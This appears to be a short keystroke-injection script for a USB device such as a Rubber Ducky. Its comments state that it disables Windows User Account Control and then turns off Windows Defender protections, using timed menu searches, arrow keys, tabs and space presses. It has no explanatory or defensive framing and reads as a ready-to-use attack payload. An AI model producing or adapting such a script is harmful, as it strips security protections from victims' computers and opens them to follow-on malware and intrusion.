DELAY 2000
REM first disable UAC
CONTROL ESCAPE
DELAY 2000
STRING uac
DELAY 2000
ENTER
DELAY 2000
DOWNARROW
DELAY 2000
DOWNARROW
DELAY 2000
DOWNARROW
DELAY 2000
TAB
DELAY 2000
ENTER
DELAY 2000
LEFT
DELAY 2000
ENTER
DELAY 2000
REM it's time to disable the fuckin' defender....
CONTROL ESCAPE
DELAY 2000
STRING virus pro
DELAY 2000
ENTER
DELAY 2000
TAB
DELAY 2000
TAB
DELAY 2000
TAB
DELAY 2000
TAB
DELAY 2000
ENTER
DELAY 2000
SPACE
DELAY 2000
TAB
DELAY 2000
SPACE
DELAY 2000
TAB
DELAY 2000
TAB
DELAY 2000
SPACE